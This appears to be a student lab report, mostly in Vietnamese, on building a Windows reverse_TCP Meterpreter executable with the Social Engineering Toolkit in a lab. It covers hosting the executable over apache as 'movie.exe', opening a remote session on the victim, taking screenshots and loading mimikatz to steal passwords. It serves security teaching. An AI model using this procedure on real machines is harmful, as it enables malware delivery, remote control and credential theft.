Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 8

Name: Lê Minh Hoàng

Number: SE130425

Lab-Project 2: Creating Infectious Media


with the Social Engineering Toolkit

1/ Finding the Attacker's IP Address


- Sử dụng lệnh “Ifconfig” để kiểm tra địa chỉ IP. Ở đây địa chỉ IP là: 192.168.194.162

2/ Launch the Social Engineering Toolkit


3/ Creating Infectious Media
- Chọn phương thức “Social-Engineering Attacks” 
- Chọn “Infectious Media Generator” 

- Chọn “Standard Metasploit Executable” 


- Chọn “Windows Reverse_TCP Meterpreter”. Sau đó nhập địa chỉ IP hiện tại và nhập
Port là 5555

- Sau khi chạy xong chọn Yes


4/ Delivering the Payload to the Windows Target:
- Khởi động service apache “service apache2 start”

5/ Running the Malware on the Target Machine:


- Bên máy nạn nhân, chạy url “192.168.194.162/movie.exe” để tải file movie.exe được tạo
ở trên bên máy kali. Chạy file movie.exe.
6/ Exploiting the Target:
- Sau khi chạy file movie.exe bên máy nạn nhân. Ta thấy có 1 thông báo được gửi về máy
kali. Hiển thị 1 Meterpreter session 1 đã được mở từ 192.168.194.162:5555(Ip máy kali)
 192.168.194.134:49193( Ip máy nạn nhân).

7/ Opening an Interactive Meterpreter Session:


- Chạy lệnh “sessions -i 1”, thử câu lệnh “screenshot” để chụp màn hình nạn nhân
- Kết quả:

8/ Stealing a Password:
- Chạy lệnh “load mimikatz” và “kerberos”

You might also like